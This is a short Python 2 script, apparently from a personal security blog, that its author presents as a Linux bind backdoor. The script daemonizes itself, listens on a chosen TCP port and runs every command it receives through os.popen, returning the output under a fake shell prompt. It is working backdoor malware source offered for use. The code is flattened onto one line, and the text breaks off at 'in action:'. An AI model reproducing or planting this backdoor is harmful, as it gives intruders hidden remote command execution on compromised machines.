#!/usr/bin/python #Info : This is a linux based bind backdoor and # this is NOT an interactive Shell! #Author : otoy #Date : 0x102010 #Blog : otoyrood.wordpress.com import socket,sys,os,re def daemonize(): pid = os.fork() if(pid != 0): os._exit(0) def main(): if len(sys.argv) < 2: print "Usage:",sys.argv[0],"<port>" sys.exit(1) UID = os.getlogin() CWD = os.getcwd() STM = os.uname() if UID == 'root': SIGN = ' # ' else: SIGN = ' $ ' ls = socket.socket(socket.AF_INET,socket.SOCK_STREAM); port = int(sys.argv[1]) ls.bind(('', port)) ls.listen(1) (conn, addr) = ls.accept() try: while (1): bdsh = UID+'@'+STM[1]+':'+CWD+SIGN conn.send(bdsh) pktcmd = conn.recv(1024) rcmd = pktcmd.strip() cdir = re.findall('cd (.*)',rcmd) try: os.chdir(cdir[0]) CWD = os.getcwd() except OSError: conn.send('No such file or directory: '+cdir[0]) except IndexError: pass if rcmd == 'quit': conn.close() sys.exit(1) elif rcmd == '': rcmd = 'echo " "' lcmd = os.popen(rcmd) cmdstr = lcmd.read().strip() conn.send(cmdstr+'\n') except(socket.error): conn.close() sys.exit(1) if __name__ == '__main__': try: daemonize() main() except(KeyboardInterrupt): sys.exit(1)
in action: